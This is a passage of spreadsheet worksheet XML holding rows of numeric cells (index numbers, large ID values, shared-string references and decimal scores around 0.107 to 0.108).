      <c r="A21307" s="1">
        <v>10388.0</v>
      </c>
      <c r="B21307" s="2">
        <v>8530102.0</v>
      </c>
      <c r="C21307" s="2" t="s">
        <v>20566</v>
      </c>
      <c r="D21307" s="2">
        <v>1.0</v>
      </c>
      <c r="E21307" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21307" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21308" ht="15.75" customHeight="1">
      <c r="A21308" s="1">
        <v>13808.0</v>
      </c>
      <c r="B21308" s="2">
        <v>3.6660419E7</v>
      </c>
      <c r="C21308" s="2" t="s">
        <v>20567</v>
      </c>
      <c r="D21308" s="2">
        <v>1.0</v>
      </c>
      <c r="E21308" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21308" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21309" ht="15.75" customHeight="1">
      <c r="A21309" s="1">
        <v>13869.0</v>
      </c>
      <c r="B21309" s="2">
        <v>3.6955623E7</v>
      </c>
      <c r="C21309" s="2" t="s">
        <v>20568</v>
      </c>
      <c r="D21309" s="2">
        <v>1.0</v>
      </c>
      <c r="E21309" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21309" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21310" ht="15.75" customHeight="1">
      <c r="A21310" s="1">
        <v>16857.0</v>
      </c>
      <c r="B21310" s="2">
        <v>4.7923123E7</v>
      </c>
      <c r="C21310" s="2" t="s">
        <v>20569</v>
      </c>
      <c r="D21310" s="2">
        <v>1.0</v>
      </c>
      <c r="E21310" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21310" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21311" ht="15.75" customHeight="1">
      <c r="A21311" s="1">
        <v>17935.0</v>
      </c>
      <c r="B21311" s="2">
        <v>5.1238487E7</v>
      </c>
      <c r="C21311" s="2" t="s">
        <v>20570</v>
      </c>
      <c r="D21311" s="2">
        <v>1.0</v>
      </c>
      <c r="E21311" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21311" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21312" ht="15.75" customHeight="1">
      <c r="A21312" s="1">
        <v>18909.0</v>
      </c>
      <c r="B21312" s="2">
        <v>5.4191511E7</v>
      </c>
      <c r="C21312" s="2" t="s">
        <v>20571</v>
      </c>
      <c r="D21312" s="2">
        <v>1.0</v>
      </c>
      <c r="E21312" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21312" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21313" ht="15.75" customHeight="1">
      <c r="A21313" s="1">
        <v>19739.0</v>
      </c>
      <c r="B21313" s="2">
        <v>5.6690984E7</v>
      </c>
      <c r="C21313" s="2" t="s">
        <v>20572</v>
      </c>
      <c r="D21313" s="2">
        <v>1.0</v>
      </c>
      <c r="E21313" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21313" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21314" ht="15.75" customHeight="1">
      <c r="A21314" s="1">
        <v>24201.0</v>
      </c>
      <c r="B21314" s="2">
        <v>1.0350851E7</v>
      </c>
      <c r="C21314" s="2" t="s">
        <v>20573</v>
      </c>
      <c r="D21314" s="2">
        <v>1.0</v>
      </c>
      <c r="E21314" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21314" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21315" ht="15.75" customHeight="1">
      <c r="A21315" s="1">
        <v>26112.0</v>
      </c>
      <c r="B21315" s="2">
        <v>1.582042E7</v>
      </c>
      <c r="C21315" s="2" t="s">
        <v>20574</v>
      </c>
      <c r="D21315" s="2">
        <v>1.0</v>
      </c>
      <c r="E21315" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21315" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21316" ht="15.75" customHeight="1">
      <c r="A21316" s="1">
        <v>31075.0</v>
      </c>
      <c r="B21316" s="2">
        <v>4.8308725E7</v>
      </c>
      <c r="C21316" s="2" t="s">
        <v>20575</v>
      </c>
      <c r="D21316" s="2">
        <v>1.0</v>
      </c>
      <c r="E21316" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21316" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21317" ht="15.75" customHeight="1">
      <c r="A21317" s="1">
        <v>31147.0</v>
      </c>
      <c r="B21317" s="2">
        <v>4889847.0</v>
      </c>
      <c r="C21317" s="2" t="s">
        <v>20576</v>
      </c>
      <c r="D21317" s="2">
        <v>1.0</v>
      </c>
      <c r="E21317" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21317" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21318" ht="15.75" customHeight="1">
      <c r="A21318" s="1">
        <v>2422.0</v>
      </c>
      <c r="B21318" s="2">
        <v>3.3572404E7</v>
      </c>
      <c r="C21318" s="2" t="s">
        <v>20577</v>
      </c>
      <c r="D21318" s="2">
        <v>1.0</v>
      </c>
      <c r="E21318" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21318" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21319" ht="15.75" customHeight="1">
      <c r="A21319" s="1">
        <v>7974.0</v>
      </c>
      <c r="B21319" s="2">
        <v>5.2701453E7</v>
      </c>
      <c r="C21319" s="2" t="s">
        <v>20578</v>
      </c>
      <c r="D21319" s="2">
        <v>1.0</v>
      </c>
      <c r="E21319" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21319" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21320" ht="15.75" customHeight="1">
      <c r="A21320" s="1">
        <v>12914.0</v>
      </c>
      <c r="B21320" s="2">
        <v>3.219923E7</v>
      </c>
      <c r="C21320" s="2" t="s">
        <v>20579</v>
      </c>
      <c r="D21320" s="2">
        <v>1.0</v>
      </c>
      <c r="E21320" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21320" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21321" ht="15.75" customHeight="1">
      <c r="A21321" s="1">
        <v>13480.0</v>
      </c>
      <c r="B21321" s="2">
        <v>3.533296E7</v>
      </c>
      <c r="C21321" s="2" t="s">
        <v>20580</v>
      </c>
      <c r="D21321" s="2">
        <v>1.0</v>
      </c>
      <c r="E21321" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21321" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21322" ht="15.75" customHeight="1">
      <c r="A21322" s="1">
        <v>16609.0</v>
      </c>
      <c r="B21322" s="2">
        <v>4.7052753E7</v>
      </c>
      <c r="C21322" s="2" t="s">
        <v>20581</v>
      </c>
      <c r="D21322" s="2">
        <v>1.0</v>
      </c>
      <c r="E21322" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21322" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21323" ht="15.75" customHeight="1">
      <c r="A21323" s="1">
        <v>17044.0</v>
      </c>
      <c r="B21323" s="2">
        <v>4.8525875E7</v>
      </c>
      <c r="C21323" s="2" t="s">
        <v>20582</v>
      </c>
      <c r="D21323" s="2">
        <v>1.0</v>
      </c>
      <c r="E21323" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21323" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21324" ht="15.75" customHeight="1">
      <c r="A21324" s="1">
        <v>17144.0</v>
      </c>
      <c r="B21324" s="2">
        <v>4.8839943E7</v>
      </c>
      <c r="C21324" s="2" t="s">
        <v>20583</v>
      </c>
      <c r="D21324" s="2">
        <v>1.0</v>
      </c>
      <c r="E21324" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21324" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21325" ht="15.75" customHeight="1">
      <c r="A21325" s="1">
        <v>19539.0</v>
      </c>
      <c r="B21325" s="2">
        <v>5.6025887E7</v>
      </c>
      <c r="C21325" s="2" t="s">
        <v>20584</v>
      </c>
      <c r="D21325" s="2">
        <v>1.0</v>
      </c>
      <c r="E21325" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21325" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="21326" ht="15.75" customHeight="1">
      <c r="A21326" s="1">
        <v>2848.0</v>
      </c>
      <c r="B21326" s="2">
        <v>3.5470557E7</v>
      </c>
      <c r="C21326" s="2" t="s">
        <v>20585</v>
      </c>
      <c r="D21326" s="2">
        <v>1.0</v>
      </c>
      <c r="E21326" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21326" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="21327" ht="15.75" customHeight="1">
      <c r="A21327" s="1">
        <v>5909.0</v>
      </c>
      <c r="B21327" s="2">
        <v>4.7202668E7</v>
      </c>
      <c r="C21327" s="2" t="s">
        <v>20586</v>
      </c>
      <c r="D21327" s="2">
        <v>1.0</v>
      </c>
      <c r="E21327" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21327" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="21328" ht="15.75" customHeight="1">
      <c r="A21328" s="1">
        <v>7250.0</v>
      </c>
      <c r="B21328" s="2">
        <v>5.0705605E7</v>
      </c>
      <c r="C21328" s="2" t="s">
        <v>20587</v>
      </c>
      <c r="D21328" s="2">
        <v>1.0</v>
      </c>
      <c r="E21328" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21328" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="21329" ht="15.75" customHeight="1">
      <c r="A21329" s="1">
        <v>7366.0</v>
      </c>
      <c r="B21329" s="2">
        <v>5.1024907E7</v>
      </c>
      <c r="C21329" s="2" t="s">
        <v>20588</v>
      </c>
      <c r="D21329" s="2">
        <v>1.0</v>
      </c>
      <c r="E21329" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21329" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="21330" ht="15.75" customHeight="1">
      <c r="A21330" s="1">
        <v>16349.0</v>
      </c>
      <c r="B21330" s="2">
        <v>4.6087516E7</v>
      </c>
      <c r="C21330" s="2" t="s">
        <v>20589</v>
      </c>
      <c r="D21330" s="2">
        <v>1.0</v>
      </c>
      <c r="E21330" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21330" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="21331" ht="15.75" customHeight="1">
      <c r="A21331" s="1">
        <v>20680.0</v>
      </c>
      <c r="B21331" s="2">
        <v>1.4441636E7</v>
      </c>
      <c r="C21331" s="2" t="s">
        <v>20410</v>
      </c>
      <c r="D21331" s="2">
        <v>1.0</v>
      </c>
      <c r="E21331" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21331" s="2">
        <v>0.108080808080808</v>
      </c>
    </row>
    <row r="21332" ht="15.75" customHeight="1">
      <c r="A21332" s="1">
        <v>1080.0</v>
      </c>
      <c r="B21332" s="2">
        <v>2.3635624E7</v>
      </c>
      <c r="C21332" s="2" t="s">
        <v>20590</v>
      </c>
      <c r="D21332" s="2">
        <v>1.0</v>
      </c>
      <c r="E21332" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21332" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21333" ht="15.75" customHeight="1">
      <c r="A21333" s="1">
        <v>2648.0</v>
      </c>
      <c r="B21333" s="2">
        <v>3.4670063E7</v>
      </c>
      <c r="C21333" s="2" t="s">
        <v>20591</v>
      </c>
      <c r="D21333" s="2">
        <v>1.0</v>
      </c>
      <c r="E21333" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21333" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21334" ht="15.75" customHeight="1">
      <c r="A21334" s="1">
        <v>2760.0</v>
      </c>
      <c r="B21334" s="2">
        <v>3.5103425E7</v>
      </c>
      <c r="C21334" s="2" t="s">
        <v>20592</v>
      </c>
      <c r="D21334" s="2">
        <v>1.0</v>
      </c>
      <c r="E21334" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21334" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21335" ht="15.75" customHeight="1">
      <c r="A21335" s="1">
        <v>2775.0</v>
      </c>
      <c r="B21335" s="2">
        <v>3.517113E7</v>
      </c>
      <c r="C21335" s="2" t="s">
        <v>20593</v>
      </c>
      <c r="D21335" s="2">
        <v>1.0</v>
      </c>
      <c r="E21335" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21335" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21336" ht="15.75" customHeight="1">
      <c r="A21336" s="1">
        <v>2816.0</v>
      </c>
      <c r="B21336" s="2">
        <v>3.5383448E7</v>
      </c>
      <c r="C21336" s="2" t="s">
        <v>20594</v>
      </c>
      <c r="D21336" s="2">
        <v>1.0</v>
      </c>
      <c r="E21336" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21336" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21337" ht="15.75" customHeight="1">
      <c r="A21337" s="1">
        <v>5092.0</v>
      </c>
      <c r="B21337" s="2">
        <v>4.4487441E7</v>
      </c>
      <c r="C21337" s="2" t="s">
        <v>20595</v>
      </c>
      <c r="D21337" s="2">
        <v>1.0</v>
      </c>
      <c r="E21337" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21337" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21338" ht="15.75" customHeight="1">
      <c r="A21338" s="1">
        <v>6259.0</v>
      </c>
      <c r="B21338" s="2">
        <v>4.8115828E7</v>
      </c>
      <c r="C21338" s="2" t="s">
        <v>20596</v>
      </c>
      <c r="D21338" s="2">
        <v>1.0</v>
      </c>
      <c r="E21338" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21338" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21339" ht="15.75" customHeight="1">
      <c r="A21339" s="1">
        <v>8384.0</v>
      </c>
      <c r="B21339" s="2">
        <v>5.3825505E7</v>
      </c>
      <c r="C21339" s="2" t="s">
        <v>20597</v>
      </c>
      <c r="D21339" s="2">
        <v>1.0</v>
      </c>
      <c r="E21339" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21339" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21340" ht="15.75" customHeight="1">
      <c r="A21340" s="1">
        <v>8776.0</v>
      </c>
      <c r="B21340" s="2">
        <v>5.458593E7</v>
      </c>
      <c r="C21340" s="2" t="s">
        <v>20598</v>
      </c>
      <c r="D21340" s="2">
        <v>1.0</v>
      </c>
      <c r="E21340" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21340" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21341" ht="15.75" customHeight="1">
      <c r="A21341" s="1">
        <v>9691.0</v>
      </c>
      <c r="B21341" s="2">
        <v>5.6351889E7</v>
      </c>
      <c r="C21341" s="2" t="s">
        <v>20599</v>
      </c>
      <c r="D21341" s="2">
        <v>1.0</v>
      </c>
      <c r="E21341" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21341" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21342" ht="15.75" customHeight="1">
      <c r="A21342" s="1">
        <v>10180.0</v>
      </c>
      <c r="B21342" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C21342" s="2" t="s">
        <v>20600</v>
      </c>
      <c r="D21342" s="2">
        <v>1.0</v>
      </c>
      <c r="E21342" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21342" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21343" ht="15.75" customHeight="1">
      <c r="A21343" s="1">
        <v>11506.0</v>
      </c>
      <c r="B21343" s="2">
        <v>2.2147374E7</v>
      </c>
      <c r="C21343" s="2" t="s">
        <v>20601</v>
      </c>
      <c r="D21343" s="2">
        <v>1.0</v>
      </c>
      <c r="E21343" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21343" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21344" ht="15.75" customHeight="1">
      <c r="A21344" s="1">
        <v>17045.0</v>
      </c>
      <c r="B21344" s="2">
        <v>4.8525875E7</v>
      </c>
      <c r="C21344" s="2" t="s">
        <v>20602</v>
      </c>
      <c r="D21344" s="2">
        <v>1.0</v>
      </c>
      <c r="E21344" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21344" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21345" ht="15.75" customHeight="1">
      <c r="A21345" s="1">
        <v>18318.0</v>
      </c>
      <c r="B21345" s="2">
        <v>5.2390223E7</v>
      </c>
      <c r="C21345" s="2" t="s">
        <v>20603</v>
      </c>
      <c r="D21345" s="2">
        <v>1.0</v>
      </c>
      <c r="E21345" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21345" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21346" ht="15.75" customHeight="1">
      <c r="A21346" s="1">
        <v>18725.0</v>
      </c>
      <c r="B21346" s="2">
        <v>5.3693864E7</v>
      </c>
      <c r="C21346" s="2" t="s">
        <v>20604</v>
      </c>
      <c r="D21346" s="2">
        <v>1.0</v>
      </c>
      <c r="E21346" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21346" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21347" ht="15.75" customHeight="1">
      <c r="A21347" s="1">
        <v>20732.0</v>
      </c>
      <c r="B21347" s="2">
        <v>1.4715088E7</v>
      </c>
      <c r="C21347" s="2" t="s">
        <v>20605</v>
      </c>
      <c r="D21347" s="2">
        <v>1.0</v>
      </c>
      <c r="E21347" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21347" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21348" ht="15.75" customHeight="1">
      <c r="A21348" s="1">
        <v>29441.0</v>
      </c>
      <c r="B21348" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C21348" s="2" t="s">
        <v>20606</v>
      </c>
      <c r="D21348" s="2">
        <v>1.0</v>
      </c>
      <c r="E21348" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21348" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="21349" ht="15.75" customHeight="1">
      <c r="A21349" s="1">
        <v>185.0</v>
      </c>
      <c r="B21349" s="2">
        <v>1.4267465E7</v>
      </c>
      <c r="C21349" s="2" t="s">
        <v>20607</v>
      </c>
      <c r="D21349" s="2">
        <v>1.0</v>
      </c>
      <c r="E21349" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21349" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="21350" ht="15.75" customHeight="1">
      <c r="A21350" s="1">
        <v>1086.0</v>
      </c>
      <c r="B21350" s="2">
        <v>2.3732417E7</v>
      </c>
      <c r="C21350" s="2" t="s">
        <v>20608</v>
      </c>
      <c r="D21350" s="2">
        <v>1.0</v>
      </c>
      <c r="E21350" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21350" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="21351" ht="15.75" customHeight="1">
      <c r="A21351" s="1">
        <v>3079.0</v>
      </c>
      <c r="B21351" s="2">
        <v>3.6578085E7</v>
      </c>
      <c r="C21351" s="2" t="s">
        <v>20609</v>
      </c>
      <c r="D21351" s="2">
        <v>1.0</v>
      </c>
      <c r="E21351" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21351" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="21352" ht="15.75" customHeight="1">
      <c r="A21352" s="1">
        <v>4297.0</v>
      </c>
      <c r="B21352" s="2">
        <v>4.1915281E7</v>
      </c>
      <c r="C21352" s="2" t="s">
        <v>20610</v>
      </c>
      <c r="D21352" s="2">
        <v>1.0</v>
      </c>
      <c r="E21352" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21352" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="21353" ht="15.75" customHeight="1">
      <c r="A21353" s="1">
        <v>9613.0</v>
      </c>
      <c r="B21353" s="2">
        <v>5.6178842E7</v>
      </c>
      <c r="C21353" s="2" t="s">
        <v>20611</v>
      </c>
      <c r="D21353" s="2">
        <v>1.0</v>
      </c>
      <c r="E21353" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21353" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="21354" ht="15.75" customHeight="1">
      <c r="A21354" s="1">
        <v>9618.0</v>
      </c>
      <c r="B21354" s="2">
        <v>5.620019E7</v>
      </c>
      <c r="C21354" s="2" t="s">
        <v>20612</v>
      </c>
      <c r="D21354" s="2">
        <v>1.0</v>
      </c>
      <c r="E21354" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21354" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="21355" ht="15.75" customHeight="1">
      <c r="A21355" s="1">
        <v>12002.0</v>
      </c>
      <c r="B21355" s="2">
        <v>2.5961838E7</v>
      </c>
      <c r="C21355" s="2" t="s">
        <v>20613</v>
      </c>
      <c r="D21355" s="2">
        <v>1.0</v>
      </c>
      <c r="E21355" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21355" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="21356" ht="15.75" customHeight="1">
      <c r="A21356" s="1">
        <v>6237.0</v>
      </c>
      <c r="B21356" s="2">
        <v>4.8079298E7</v>
      </c>
      <c r="C21356" s="2" t="s">
        <v>20614</v>
      </c>
      <c r="D21356" s="2">
        <v>1.0</v>
      </c>
      <c r="E21356" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21356" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="21357" ht="15.75" customHeight="1">
      <c r="A21357" s="1">
        <v>7628.0</v>
      </c>
      <c r="B21357" s="2">
        <v>5.1749652E7</v>
      </c>
      <c r="C21357" s="2" t="s">
        <v>20615</v>
      </c>
      <c r="D21357" s="2">
        <v>1.0</v>
      </c>
      <c r="E21357" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21357" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="21358" ht="15.75" customHeight="1">
      <c r="A21358" s="1">
        <v>13819.0</v>
      </c>
      <c r="B21358" s="2">
        <v>3.6717428E7</v>
      </c>
      <c r="C21358" s="2" t="s">
        <v>20616</v>
      </c>
      <c r="D21358" s="2">
        <v>1.0</v>
      </c>
      <c r="E21358" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21358" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="21359" ht="15.75" customHeight="1">
      <c r="A21359" s="1">
        <v>14470.0</v>
      </c>
      <c r="B21359" s="2">
        <v>3.9505972E7</v>
      </c>
      <c r="C21359" s="2" t="s">
        <v>20617</v>
      </c>
      <c r="D21359" s="2">
        <v>1.0</v>
      </c>
      <c r="E21359" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21359" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="21360" ht="15.75" customHeight="1">
      <c r="A21360" s="1">
        <v>23172.0</v>
      </c>
      <c r="B21360" s="2">
        <v>5.2114021E7</v>
      </c>
      <c r="C21360" s="2" t="s">
        <v>20618</v>
      </c>
      <c r="D21360" s="2">
        <v>1.0</v>
      </c>
      <c r="E21360" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21360" s="2">
        <v>0.1070261437908497</v>
      </c>
    </row>
    <row r="21361" ht="15.75" customHeight="1">
      <c r="A21361" s="1">
        <v>32141.0</v>
      </c>
      <c r="B21361" s="2">
        <v>5.4216631E7</v>
      </c>
      <c r="C21361" s="2" t="s">
        <v>20619</v>
      </c>
      <c r="D21361" s="2">
        <v>1.0</v>
      </c>
      <c r="E21361" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21361" s="2">
        <v>0.1070261437908497</v>
      </c>
    </row>
    <row r="21362" ht="15.75" customHeight="1">
      <c r="A21362" s="1">
        <v>2637.0</v>
      </c>
      <c r="B21362" s="2">
        <v>3.4597189E7</v>
      </c>
      <c r="C21362" s="2" t="s">
        <v>20620</v>
      </c>
      <c r="D21362" s="2">
        <v>1.0</v>
      </c>
      <c r="E21362" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21362" s="2">
        <v>0.1068376068376068</v>
      </c>
    </row>
    <row r="21363" ht="15.75" customHeight="1">
      <c r="A21363" s="1">
        <v>29102.0</v>
      </c>
      <c r="B21363" s="2">
        <v>3.0416075E7</v>
      </c>
      <c r="C21363" s="2" t="s">
        <v>20621</v>
      </c>
      <c r="D21363" s="2">
        <v>1.0</v>
      </c>
      <c r="E21363" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21363" s="2">
        <v>0.1067708333333333</v>
      </c>
    </row>
    <row r="21364" ht="15.75" customHeight="1">
      <c r="A21364" s="1">
        <v>15631.0</v>
      </c>
      <c r="B21364" s="2">
        <v>4.3576332E7</v>
      </c>
      <c r="C21364" s="2" t="s">
        <v>20622</v>
      </c>
      <c r="D21364" s="2">
        <v>1.0</v>
      </c>
      <c r="E21364" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21364" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="21365" ht="15.75" customHeight="1">
      <c r="A21365" s="1">
        <v>8277.0</v>
      </c>
      <c r="B21365" s="2">
        <v>5.346863E7</v>
      </c>
      <c r="C21365" s="2" t="s">
        <v>20623</v>
      </c>
      <c r="D21365" s="2">
        <v>1.0</v>
      </c>
      <c r="E21365" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21365" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="21366" ht="15.75" customHeight="1">
      <c r="A21366" s="1">
        <v>1602.0</v>
      </c>
      <c r="B21366" s="2">
        <v>2.7791694E7</v>
      </c>
      <c r="C21366" s="2" t="s">
        <v>20624</v>
      </c>
      <c r="D21366" s="2">
        <v>1.0</v>
      </c>
      <c r="E21366" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21366" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21367" ht="15.75" customHeight="1">
      <c r="A21367" s="1">
        <v>1982.0</v>
      </c>
      <c r="B21367" s="2">
        <v>3.0484167E7</v>
      </c>
      <c r="C21367" s="2" t="s">
        <v>20625</v>
      </c>
      <c r="D21367" s="2">
        <v>1.0</v>
      </c>
      <c r="E21367" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21367" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21368" ht="15.75" customHeight="1">
      <c r="A21368" s="1">
        <v>2195.0</v>
      </c>
      <c r="B21368" s="2">
        <v>3.2010862E7</v>
      </c>
      <c r="C21368" s="2" t="s">
        <v>20626</v>
      </c>
      <c r="D21368" s="2">
        <v>1.0</v>
      </c>
      <c r="E21368" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21368" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21369" ht="15.75" customHeight="1">
      <c r="A21369" s="1">
        <v>2999.0</v>
      </c>
      <c r="B21369" s="2">
        <v>3.6293039E7</v>
      </c>
      <c r="C21369" s="2" t="s">
        <v>20627</v>
      </c>
      <c r="D21369" s="2">
        <v>1.0</v>
      </c>
      <c r="E21369" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21369" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21370" ht="15.75" customHeight="1">
      <c r="A21370" s="1">
        <v>3614.0</v>
      </c>
      <c r="B21370" s="2">
        <v>3.9148724E7</v>
      </c>
      <c r="C21370" s="2" t="s">
        <v>20628</v>
      </c>
      <c r="D21370" s="2">
        <v>1.0</v>
      </c>
      <c r="E21370" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21370" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21371" ht="15.75" customHeight="1">
      <c r="A21371" s="1">
        <v>3937.0</v>
      </c>
      <c r="B21371" s="2">
        <v>4.0596906E7</v>
      </c>
      <c r="C21371" s="2" t="s">
        <v>20629</v>
      </c>
      <c r="D21371" s="2">
        <v>1.0</v>
      </c>
      <c r="E21371" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21371" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21372" ht="15.75" customHeight="1">
      <c r="A21372" s="1">
        <v>4011.0</v>
      </c>
      <c r="B21372" s="2">
        <v>4.0915738E7</v>
      </c>
      <c r="C21372" s="2" t="s">
        <v>20630</v>
      </c>
      <c r="D21372" s="2">
        <v>1.0</v>
      </c>
      <c r="E21372" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21372" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21373" ht="15.75" customHeight="1">
      <c r="A21373" s="1">
        <v>6420.0</v>
      </c>
      <c r="B21373" s="2">
        <v>4.8545175E7</v>
      </c>
      <c r="C21373" s="2" t="s">
        <v>20631</v>
      </c>
      <c r="D21373" s="2">
        <v>1.0</v>
      </c>
      <c r="E21373" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21373" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="21374" ht="15.75" customHeight="1">
